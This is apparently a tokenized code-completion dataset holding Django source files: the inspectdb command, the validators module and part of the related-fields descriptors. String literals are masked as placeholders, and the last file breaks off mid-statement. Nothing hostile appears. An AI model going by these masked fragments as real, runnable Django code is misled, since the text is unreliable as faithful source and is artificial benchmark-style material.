<s> from __future__ import unicode_literals <EOL> import keyword <EOL> import re <EOL> from optparse import make_option <EOL> from django . core . management . base import NoArgsCommand , CommandError <EOL> from django . db import connections , DEFAULT_DB_ALIAS <EOL> from django . utils import six <EOL> class Command ( NoArgsCommand ) : <EOL> help = "<STR_LIT>" <EOL> option_list = NoArgsCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , <EOL> default = DEFAULT_DB_ALIAS , help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> requires_model_validation = False <EOL> db_module = '<STR_LIT>' <EOL> def handle_noargs ( self , ** options ) : <EOL> try : <EOL> for line in self . handle_inspection ( options ) : <EOL> self . stdout . write ( "<STR_LIT>" % line ) <EOL> except NotImplementedError : <EOL> raise CommandError ( "<STR_LIT>" ) <EOL> def handle_inspection ( self , options ) : <EOL> connection = connections [ options . get ( '<STR_LIT>' ) ] <EOL> table_name_filter = options . get ( '<STR_LIT>' ) <EOL> table2model = lambda table_name : table_name . title ( ) . replace ( '<STR_LIT:_>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> strip_prefix = lambda s : s . startswith ( "<STR_LIT>" ) and s [ <NUM_LIT:1> : ] or s <EOL> cursor = connection . cursor ( ) <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT:#>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield '<STR_LIT>' <EOL> yield '<STR_LIT>' % self . db_module <EOL> yield '<STR_LIT>' <EOL> known_models = [ ] <EOL> for table_name in connection . introspection . 
table_names ( cursor ) : <EOL> if table_name_filter is not None and callable ( table_name_filter ) : <EOL> if not table_name_filter ( table_name ) : <EOL> continue <EOL> yield '<STR_LIT>' % table2model ( table_name ) <EOL> known_models . append ( table2model ( table_name ) ) <EOL> try : <EOL> relations = connection . introspection . get_relations ( cursor , table_name ) <EOL> except NotImplementedError : <EOL> relations = { } <EOL> try : <EOL> indexes = connection . introspection . get_indexes ( cursor , table_name ) <EOL> except NotImplementedError : <EOL> indexes = { } <EOL> used_column_names = [ ] <EOL> for i , row in enumerate ( connection . introspection . get_table_description ( cursor , table_name ) ) : <EOL> comment_notes = [ ] <EOL> extra_params = { } <EOL> column_name = row [ <NUM_LIT:0> ] <EOL> is_relation = i in relations <EOL> att_name , params , notes = self . normalize_col_name ( <EOL> column_name , used_column_names , is_relation ) <EOL> extra_params . update ( params ) <EOL> comment_notes . extend ( notes ) <EOL> used_column_names . append ( att_name ) <EOL> if column_name in indexes : <EOL> if indexes [ column_name ] [ '<STR_LIT:primary_key>' ] : <EOL> extra_params [ '<STR_LIT:primary_key>' ] = True <EOL> elif indexes [ column_name ] [ '<STR_LIT>' ] : <EOL> extra_params [ '<STR_LIT>' ] = True <EOL> if is_relation : <EOL> rel_to = relations [ i ] [ <NUM_LIT:1> ] == table_name and "<STR_LIT>" or table2model ( relations [ i ] [ <NUM_LIT:1> ] ) <EOL> if rel_to in known_models : <EOL> field_type = '<STR_LIT>' % rel_to <EOL> else : <EOL> field_type = "<STR_LIT>" % rel_to <EOL> else : <EOL> field_type , field_params , field_notes = self . get_field_type ( connection , table_name , row ) <EOL> extra_params . update ( field_params ) <EOL> comment_notes . 
extend ( field_notes ) <EOL> field_type += '<STR_LIT:(>' <EOL> if att_name == '<STR_LIT:id>' and field_type == '<STR_LIT>' and extra_params == { '<STR_LIT:primary_key>' : True } : <EOL> continue <EOL> if row [ <NUM_LIT:6> ] : <EOL> extra_params [ '<STR_LIT:blank>' ] = True <EOL> if not field_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extra_params [ '<STR_LIT:null>' ] = True <EOL> field_desc = '<STR_LIT>' % ( att_name , field_type ) <EOL> if extra_params : <EOL> if not field_desc . endswith ( '<STR_LIT:(>' ) : <EOL> field_desc += '<STR_LIT:U+002CU+0020>' <EOL> field_desc += '<STR_LIT:U+002CU+0020>' . join ( [ <EOL> '<STR_LIT>' % ( k , strip_prefix ( repr ( v ) ) ) <EOL> for k , v in extra_params . items ( ) ] ) <EOL> field_desc += '<STR_LIT:)>' <EOL> if comment_notes : <EOL> field_desc += '<STR_LIT>' + '<STR_LIT:U+0020>' . join ( comment_notes ) <EOL> yield '<STR_LIT>' % field_desc <EOL> for meta_line in self . get_meta ( table_name ) : <EOL> yield meta_line <EOL> def normalize_col_name ( self , col_name , used_column_names , is_relation ) : <EOL> """<STR_LIT>""" <EOL> field_params = { } <EOL> field_notes = [ ] <EOL> new_name = col_name . lower ( ) <EOL> if new_name != col_name : <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if is_relation : <EOL> if new_name . endswith ( '<STR_LIT>' ) : <EOL> new_name = new_name [ : - <NUM_LIT:3> ] <EOL> else : <EOL> field_params [ '<STR_LIT>' ] = col_name <EOL> new_name , num_repl = re . subn ( r'<STR_LIT>' , '<STR_LIT:_>' , new_name ) <EOL> if num_repl > <NUM_LIT:0> : <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if new_name . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> while new_name . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> new_name = new_name . replace ( '<STR_LIT>' , '<STR_LIT:_>' ) <EOL> if col_name . lower ( ) . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> field_notes . append ( "<STR_LIT>" ) <EOL> if new_name . startswith ( '<STR_LIT:_>' ) : <EOL> new_name = '<STR_LIT>' % new_name <EOL> field_notes . 
append ( "<STR_LIT>" ) <EOL> if new_name . endswith ( '<STR_LIT:_>' ) : <EOL> new_name = '<STR_LIT>' % new_name <EOL> field_notes . append ( "<STR_LIT>" ) <EOL> if keyword . iskeyword ( new_name ) : <EOL> new_name += '<STR_LIT>' <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if new_name [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> new_name = '<STR_LIT>' % new_name <EOL> field_notes . append ( "<STR_LIT>" ) <EOL> if new_name in used_column_names : <EOL> num = <NUM_LIT:0> <EOL> while '<STR_LIT>' % ( new_name , num ) in used_column_names : <EOL> num += <NUM_LIT:1> <EOL> new_name = '<STR_LIT>' % ( new_name , num ) <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if col_name != new_name and field_notes : <EOL> field_params [ '<STR_LIT>' ] = col_name <EOL> return new_name , field_params , field_notes <EOL> def get_field_type ( self , connection , table_name , row ) : <EOL> """<STR_LIT>""" <EOL> field_params = { } <EOL> field_notes = [ ] <EOL> try : <EOL> field_type = connection . introspection . get_field_type ( row [ <NUM_LIT:1> ] , row ) <EOL> except KeyError : <EOL> field_type = '<STR_LIT>' <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if type ( field_type ) is tuple : <EOL> field_type , new_params = field_type <EOL> field_params . update ( new_params ) <EOL> if field_type == '<STR_LIT>' and row [ <NUM_LIT:3> ] : <EOL> field_params [ '<STR_LIT:max_length>' ] = row [ <NUM_LIT:3> ] <EOL> if field_type == '<STR_LIT>' : <EOL> field_params [ '<STR_LIT>' ] = row [ <NUM_LIT:4> ] <EOL> field_params [ '<STR_LIT>' ] = row [ <NUM_LIT:5> ] <EOL> return field_type , field_params , field_notes <EOL> def get_meta ( self , table_name ) : <EOL> """<STR_LIT>""" <EOL> return [ "<STR_LIT>" , <EOL> "<STR_LIT>" % table_name , <EOL> "<STR_LIT>" ] </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> try : <EOL> from urllib . parse import urlsplit , urlunsplit <EOL> except ImportError : <EOL> from urlparse import urlsplit , urlunsplit <EOL> from django . core . exceptions import ValidationError <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import force_text <EOL> from django . utils . ipv6 import is_valid_ipv6_address <EOL> from django . utils import six <EOL> EMPTY_VALUES = ( None , '<STR_LIT>' , [ ] , ( ) , { } ) <EOL> class RegexValidator ( object ) : <EOL> regex = '<STR_LIT>' <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , regex = None , message = None , code = None ) : <EOL> if regex is not None : <EOL> self . regex = regex <EOL> if message is not None : <EOL> self . message = message <EOL> if code is not None : <EOL> self . code = code <EOL> if isinstance ( self . regex , six . string_types ) : <EOL> self . regex = re . compile ( self . regex ) <EOL> def __call__ ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if not self . regex . search ( force_text ( value ) ) : <EOL> raise ValidationError ( self . message , code = self . code ) <EOL> class URLValidator ( RegexValidator ) : <EOL> regex = re . compile ( <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( URLValidator , self ) . __call__ ( value ) <EOL> except ValidationError as e : <EOL> if value : <EOL> value = force_text ( value ) <EOL> scheme , netloc , path , query , fragment = urlsplit ( value ) <EOL> try : <EOL> netloc = netloc . encode ( '<STR_LIT>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> url = urlunsplit ( ( scheme , netloc , path , query , fragment ) ) <EOL> super ( URLValidator , self ) . 
__call__ ( url ) <EOL> else : <EOL> raise <EOL> else : <EOL> url = value <EOL> def validate_integer ( value ) : <EOL> try : <EOL> int ( value ) <EOL> except ( ValueError , TypeError ) : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> class EmailValidator ( RegexValidator ) : <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( EmailValidator , self ) . __call__ ( value ) <EOL> except ValidationError as e : <EOL> if value and '<STR_LIT:@>' in value : <EOL> parts = value . split ( '<STR_LIT:@>' ) <EOL> try : <EOL> parts [ - <NUM_LIT:1> ] = parts [ - <NUM_LIT:1> ] . encode ( '<STR_LIT>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> super ( EmailValidator , self ) . __call__ ( '<STR_LIT:@>' . join ( parts ) ) <EOL> else : <EOL> raise <EOL> email_re = re . compile ( <EOL> r"<STR_LIT>" <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> validate_email = EmailValidator ( email_re , _ ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> slug_re = re . compile ( r'<STR_LIT>' ) <EOL> validate_slug = RegexValidator ( slug_re , _ ( "<STR_LIT>" ) , '<STR_LIT>' ) <EOL> ipv4_re = re . 
compile ( r'<STR_LIT>' ) <EOL> validate_ipv4_address = RegexValidator ( ipv4_re , _ ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def validate_ipv6_address ( value ) : <EOL> if not is_valid_ipv6_address ( value ) : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> def validate_ipv46_address ( value ) : <EOL> try : <EOL> validate_ipv4_address ( value ) <EOL> except ValidationError : <EOL> try : <EOL> validate_ipv6_address ( value ) <EOL> except ValidationError : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> ip_address_validator_map = { <EOL> '<STR_LIT>' : ( [ validate_ipv46_address ] , _ ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : ( [ validate_ipv4_address ] , _ ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : ( [ validate_ipv6_address ] , _ ( '<STR_LIT>' ) ) , <EOL> } <EOL> def ip_address_validators ( protocol , unpack_ipv4 ) : <EOL> """<STR_LIT>""" <EOL> if protocol != '<STR_LIT>' and unpack_ipv4 : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> try : <EOL> return ip_address_validator_map [ protocol . lower ( ) ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( protocol , list ( ip_address_validator_map ) ) ) <EOL> comma_separated_int_list_re = re . compile ( '<STR_LIT>' ) <EOL> validate_comma_separated_integer_list = RegexValidator ( comma_separated_int_list_re , _ ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class BaseValidator ( object ) : <EOL> compare = lambda self , a , b : a is not b <EOL> clean = lambda self , x : x <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , limit_value ) : <EOL> self . limit_value = limit_value <EOL> def __call__ ( self , value ) : <EOL> cleaned = self . clean ( value ) <EOL> params = { '<STR_LIT>' : self . limit_value , '<STR_LIT>' : cleaned } <EOL> if self . compare ( cleaned , self . limit_value ) : <EOL> raise ValidationError ( <EOL> self . message % params , <EOL> code = self . 
code , <EOL> params = params , <EOL> ) <EOL> class MaxValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MaxLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT:max_length>' </s>
<s> from operator import attrgetter <EOL> from django . db import connection , connections , router <EOL> from django . db . backends import util <EOL> from django . db . models import signals , get_model <EOL> from django . db . models . fields import ( AutoField , Field , IntegerField , <EOL> PositiveIntegerField , PositiveSmallIntegerField , FieldDoesNotExist ) <EOL> from django . db . models . related import RelatedObject <EOL> from django . db . models . query import QuerySet <EOL> from django . db . models . query_utils import QueryWrapper <EOL> from django . db . models . deletion import CASCADE <EOL> from django . utils . encoding import smart_text <EOL> from django . utils import six <EOL> from django . utils . translation import ugettext_lazy as _ , string_concat <EOL> from django . utils . functional import curry , cached_property <EOL> from django . core import exceptions <EOL> from django import forms <EOL> RECURSIVE_RELATIONSHIP_CONSTANT = '<STR_LIT>' <EOL> pending_lookups = { } <EOL> def add_lazy_relation ( cls , field , relation , operation ) : <EOL> """<STR_LIT>""" <EOL> if relation == RECURSIVE_RELATIONSHIP_CONSTANT : <EOL> app_label = cls . _meta . app_label <EOL> model_name = cls . __name__ <EOL> else : <EOL> if isinstance ( relation , six . string_types ) : <EOL> try : <EOL> app_label , model_name = relation . split ( "<STR_LIT:.>" ) <EOL> except ValueError : <EOL> app_label = cls . _meta . app_label <EOL> model_name = relation <EOL> else : <EOL> app_label = relation . _meta . app_label <EOL> model_name = relation . _meta . object_name <EOL> model = get_model ( app_label , model_name , <EOL> seed_cache = False , only_installed = False ) <EOL> if model : <EOL> operation ( field , model , cls ) <EOL> else : <EOL> key = ( app_label , model_name ) <EOL> value = ( cls , field , operation ) <EOL> pending_lookups . setdefault ( key , [ ] ) . 
append ( value ) <EOL> def do_pending_lookups ( sender , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> key = ( sender . _meta . app_label , sender . __name__ ) <EOL> for cls , field , operation in pending_lookups . pop ( key , [ ] ) : <EOL> operation ( field , sender , cls ) <EOL> signals . class_prepared . connect ( do_pending_lookups ) <EOL> class RelatedField ( object ) : <EOL> def contribute_to_class ( self , cls , name ) : <EOL> sup = super ( RelatedField , self ) <EOL> self . opts = cls . _meta <EOL> if hasattr ( sup , '<STR_LIT>' ) : <EOL> sup . contribute_to_class ( cls , name ) <EOL> if not cls . _meta . abstract and self . rel . related_name : <EOL> self . rel . related_name = self . rel . related_name % { <EOL> '<STR_LIT:class>' : cls . __name__ . lower ( ) , <EOL> '<STR_LIT>' : cls . _meta . app_label . lower ( ) , <EOL> } <EOL> other = self . rel . to <EOL> if isinstance ( other , six . string_types ) or other . _meta . pk is None : <EOL> def resolve_related_class ( field , model , cls ) : <EOL> field . rel . to = model <EOL> field . do_related_class ( model , cls ) <EOL> add_lazy_relation ( cls , self , other , resolve_related_class ) <EOL> else : <EOL> self . do_related_class ( other , cls ) <EOL> def set_attributes_from_rel ( self ) : <EOL> self . name = self . name or ( self . rel . to . _meta . object_name . lower ( ) + '<STR_LIT:_>' + self . rel . to . _meta . pk . name ) <EOL> if self . verbose_name is None : <EOL> self . verbose_name = self . rel . to . _meta . verbose_name <EOL> self . rel . field_name = self . rel . field_name or self . rel . to . _meta . pk . name <EOL> def do_related_class ( self , other , cls ) : <EOL> self . set_attributes_from_rel ( ) <EOL> self . related = RelatedObject ( other , cls , self ) <EOL> if not cls . _meta . abstract : <EOL> self . contribute_to_related_class ( other , self . related ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value . 
prepare ( ) <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value . _prepare ( ) <EOL> if lookup_type in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _pk_trace ( value , '<STR_LIT>' , lookup_type ) <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ self . _pk_trace ( v , '<STR_LIT>' , lookup_type ) for v in value ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return [ ] <EOL> raise TypeError ( "<STR_LIT>" % lookup_type ) <EOL> def get_db_prep_lookup ( self , lookup_type , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_lookup ( lookup_type , value ) <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> value = value . get_compiler ( connection = connection ) <EOL> if hasattr ( value , '<STR_LIT>' ) or hasattr ( value , '<STR_LIT>' ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return value <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> sql , params = value . as_sql ( ) <EOL> else : <EOL> sql , params = value . _as_sql ( connection = connection ) <EOL> return QueryWrapper ( ( '<STR_LIT>' % sql ) , params ) <EOL> if lookup_type in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return [ self . _pk_trace ( value , '<STR_LIT>' , lookup_type , <EOL> connection = connection , prepared = prepared ) ] <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return [ self . _pk_trace ( v , '<STR_LIT>' , lookup_type , <EOL> connection = connection , prepared = prepared ) <EOL> for v in value ] <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return [ ] <EOL> raise TypeError ( "<STR_LIT>" % lookup_type ) <EOL> def _pk_trace ( self , value , prep_func , lookup_type , ** kwargs ) : <EOL> v = value <EOL> if isinstance ( v , self . rel . to ) : <EOL> field_name = getattr ( self . 
rel , "<STR_LIT>" , None ) <EOL> else : <EOL> field_name = None <EOL> try : <EOL> while True : <EOL> if field_name is None : <EOL> field_name = v . _meta . pk . name <EOL> v = getattr ( v , field_name ) <EOL> field_name = None <EOL> except AttributeError : <EOL> pass <EOL> except exceptions . ObjectDoesNotExist : <EOL> v = None <EOL> field = self <EOL> while field . rel : <EOL> if hasattr ( field . rel , '<STR_LIT>' ) : <EOL> field = field . rel . to . _meta . get_field ( field . rel . field_name ) <EOL> else : <EOL> field = field . rel . to . _meta . pk <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v = [ v ] <EOL> v = getattr ( field , prep_func ) ( lookup_type , v , ** kwargs ) <EOL> if isinstance ( v , list ) : <EOL> v = v [ <NUM_LIT:0> ] <EOL> return v <EOL> def related_query_name ( self ) : <EOL> return self . rel . related_name or self . opts . object_name . lower ( ) <EOL> class SingleRelatedObjectDescriptor ( object ) : <EOL> def __init__ ( self , related ) : <EOL> self . related = related <EOL> self . cache_name = related . get_cache_name ( ) <EOL> def is_cached ( self , instance ) : <EOL> return hasattr ( instance , self . cache_name ) <EOL> def get_query_set ( self , ** db_hints ) : <EOL> db = router . db_for_read ( self . related . model , ** db_hints ) <EOL> return self . related . model . _base_manager . using ( db ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> rel_obj_attr = attrgetter ( self . related . field . attname ) <EOL> instance_attr = lambda obj : obj . _get_pk_val ( ) <EOL> instances_dict = dict ( ( instance_attr ( inst ) , inst ) for inst in instances ) <EOL> params = { '<STR_LIT>' % self . related . field . name : list ( instances_dict ) } <EOL> qs = self . get_query_set ( instance = instances [ <NUM_LIT:0> ] ) . filter ( ** params ) <EOL> rel_obj_cache_name = self . related . field . 
get_cache_name ( ) <EOL> for rel_obj in qs : <EOL> instance = instances_dict [ rel_obj_attr ( rel_obj ) ] <EOL> setattr ( rel_obj , rel_obj_cache_name , instance ) <EOL> return qs , rel_obj_attr , instance_attr , True , self . cache_name <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> try : <EOL> rel_obj = getattr ( instance , self . cache_name ) <EOL> except AttributeError : <EOL> related_pk = instance . _get_pk_val ( ) <EOL> if related_pk is None : <EOL> rel_obj = None <EOL> else : <EOL> params = { '<STR_LIT>' % self . related . field . name : related_pk } <EOL> try : <EOL> rel_obj = self . get_query_set ( instance = instance ) . get ( ** params ) <EOL> except self . related . model . DoesNotExist : <EOL> rel_obj = None <EOL> else : <EOL> setattr ( rel_obj , self . related . field . get_cache_name ( ) , instance ) <EOL> setattr ( instance , self . cache_name , rel_obj ) <EOL> if rel_obj is None : <EOL> raise self . related . model . DoesNotExist <EOL> else : <EOL> return rel_obj <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" % self . related . opts . object_name ) <EOL> if value is None and self . related . field . null == False : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( instance . _meta . object_name , self . related . get_accessor_name ( ) ) ) <EOL> elif value is not None and not isinstance ( value , self . related . model ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _meta . object_name , <EOL> self . related . get_accessor_name ( ) , self . related . opts . object_name ) ) <EOL> elif value is not None : <EOL> if instance . _state . db is None : <EOL> instance . _state . db = router . db_for_write ( instance . __class__ , instance = value ) <EOL> elif value . _state . db is None : <EOL> value . _state . db = router . db_for_write ( value . __class__ , instance = instance ) <EOL> elif value . 
_state . db is not None and instance . _state . db is not None : <EOL> if not router . allow_relation ( value , instance ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _state . db , value . _state . db ) ) <EOL> related_pk = getattr ( instance , self . related . field . rel . get_related_field ( ) . attname ) <EOL> if related_pk is None : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _meta . object_name ) ) <EOL> setattr ( value , self . related . field . attname , related_pk ) <EOL> setattr ( instance , self . cache_name , value ) <EOL> setattr ( value , self . related . field . get_cache_name ( ) , instance ) <EOL> class ReverseSingleRelatedObjectDescriptor ( object ) : <EOL> def __init__ ( self , field_with_rel ) : <EOL> self . field = field_with_rel <EOL> self . cache_name = self . field . get_cache_name ( ) <EOL> def is_cached ( self , instance ) : <EOL> return hasattr ( instance , self . cache_name ) <EOL> def get_query_set ( self , ** db_hints ) : <EOL> db = router . db_for_read ( self . field . rel . to , ** db_hints ) <EOL> rel_mgr = self . field . rel . to . _default_manager <EOL> if getattr ( rel_mgr , '<STR_LIT>' , False ) : <EOL> return rel_mgr . using ( db ) <EOL> else : <EOL> return QuerySet ( self . field . rel . to ) . using ( db ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> other_field = self . field . rel . get_related_field ( ) <EOL> rel_obj_attr = attrgetter ( other_field . attname ) <EOL> instance_attr = attrgetter ( self . field . attname ) <EOL> instances_dict = dict ( ( instance_attr ( inst ) , inst ) for inst in instances ) <EOL> if other_field . rel : <EOL> params = { '<STR_LIT>' % self . field . rel . field_name : list ( instances_dict ) } <EOL> else : <EOL> params = { '<STR_LIT>' % self . field . rel . field_name : list ( instances_dict ) } <EOL> qs = self . get_query_set ( instance = instances [ <NUM_LIT:0> ] ) . filter ( ** params ) <EOL> if not self . field . rel . 
multiple : <EOL> rel_obj_cache_name = self . field . related . get_cache_name ( ) <EOL> for rel_obj in qs : <EOL> instance = instances_dict [ rel_obj_attr ( rel_obj ) ] <EOL> setattr ( rel_obj , rel_obj_cache_name , instance ) <EOL> return qs , rel_obj_attr , instance_attr , True , self . cache_name <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> try : <EOL> rel_obj = getattr ( instance , self . cache_name ) <EOL> except AttributeError : <EOL> val = getattr ( instance , self . field . attname ) <EOL> if val is None : <EOL> rel_obj = None <EOL> else : <EOL> other_field = self . field . rel . get_related_field ( ) <EOL> if other_field . rel : <EOL> params = { '<STR_LIT>' % ( self . field . rel . field_name , other_field . rel . field_name ) : val } <EOL> else : <EOL> params = { '<STR_LIT>' % self . field . rel . field_name : val } <EOL> qs = self . get_query_set ( instance = instance ) <EOL> rel_obj = qs . get ( ** params ) <EOL> if not self . field . rel . multiple : <EOL> setattr ( rel_obj , self . field . related . get_cache_name ( ) , instance ) <EOL> setattr ( instance , self . cache_name , rel_obj ) <EOL> if rel_obj is None and not self . field . null : <EOL> raise self . field . rel . to . DoesNotExist <EOL> else : <EOL> return rel_obj <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" % self . field . name ) <EOL> if value is None and self . field . null == False : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( instance . _meta . object_name , self . field . name ) ) <EOL> elif value is not None and not isinstance ( value , self . field . rel . to ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _meta . object_name , <EOL> self . field . name , self . field . rel . to . _meta . object_name ) ) <EOL> elif value is not None : <EOL> if instance . _state . db is None : <EOL> instance . _state . db = router . 
db_for_write ( instance . __class__ , instance = value ) <EOL> elif value . _state . db is None : <EOL> value . _state . db = router . db_for_write ( value . __class__ , instance = instance ) <EOL> elif value . _state . db is not None and instance . _state . db is not None : <EOL> if not router . allow_relation ( value , instance ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( value , instance . _state . db , value . _state . db ) ) <EOL> if value is None : <EOL> related = getattr ( instance , self . cache_name , None ) <EOL> if related is not None : <EOL> setattr ( related , self . field . related . get_cache_name ( ) , None ) <EOL> try : <EOL> val = getattr ( value , self . field . rel . get_related_field ( ) . attname ) <EOL> except AttributeError : <EOL> val = None <EOL> setattr ( instance , self . field . attname , val ) <EOL> setattr ( instance , self . cache_name , value ) <EOL> if value is not None and not self . field . rel . multiple : <EOL> setattr ( value , self . field . related . get_cache_name ( ) , instance ) <EOL> class ForeignRelatedObjectsDescriptor ( object ) : <EOL> def __init__ ( self , related ) : <EOL> self . related = related <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> return self . related_manager_cls ( instance ) <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> manager = self . __get__ ( instance ) <EOL> if self . related . field . null : <EOL> manager . clear ( ) <EOL> manager . add ( * value ) <EOL> @ cached_property <EOL> def related_manager_cls ( self ) : <EOL> superclass = self . related . model . _default_manager . __class__ <EOL> rel_field = self . related . field <EOL> rel_model = self . related . model <EOL> attname = rel_field . rel . get_related_field ( ) . 
attname <EOL> class RelatedManager ( superclass ) : <EOL> def __init__ ( self , instance ) : <EOL> super ( RelatedManager , self ) . __init__ ( ) <EOL> self . instance = instance <EOL> self . core_filters = { <EOL> '<STR_LIT>' % ( rel_field . name , attname ) : getattr ( instance , attname ) <EOL> } <EOL> self . model = rel_model <EOL> def get_query_set ( self ) : <EOL> try : <EOL> return self . instance . _prefetched_objects_cache [ rel_field . related_query_name ( ) ] <EOL> except ( AttributeError , KeyError ) : <EOL> db = self . _db or router . db_for_read ( self . model , instance = self . instance ) <EOL> qs = super ( RelatedManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** self . core_filters ) <EOL> val = getattr ( self . instance , attname ) <EOL> if val is None or val == '<STR_LIT>' and connections [ db ] . features . interprets_empty_strings_as_nulls : <EOL> return qs . filter ( pk__in = [ ] ) <EOL> qs . _known_related_objects = { rel_field : { self . instance . pk : self . instance } } <EOL> return qs <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> rel_obj_attr = attrgetter ( rel_field . attname ) <EOL> instance_attr = attrgetter ( attname ) <EOL> instances_dict = dict ( ( instance_attr ( inst ) , inst ) for inst in instances ) <EOL> db = self . _db or router . db_for_read ( self . model , instance = instances [ <NUM_LIT:0> ] ) <EOL> query = { '<STR_LIT>' % ( rel_field . name , attname ) : list ( instances_dict ) } <EOL> qs = super ( RelatedManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** query ) <EOL> for rel_obj in qs : <EOL> instance = instances_dict [ rel_obj_attr ( rel_obj ) ] <EOL> setattr ( rel_obj , rel_field . name , instance ) <EOL> cache_name = rel_field . related_query_name ( ) <EOL> return qs , rel_obj_attr , instance_attr , False , cache_name <EOL> def add ( self , * objs ) : <EOL> for obj in objs : <EOL> if not isinstance ( obj , self . model ) : <EOL> raise TypeError ( "<STR_LIT>" % ( self . 
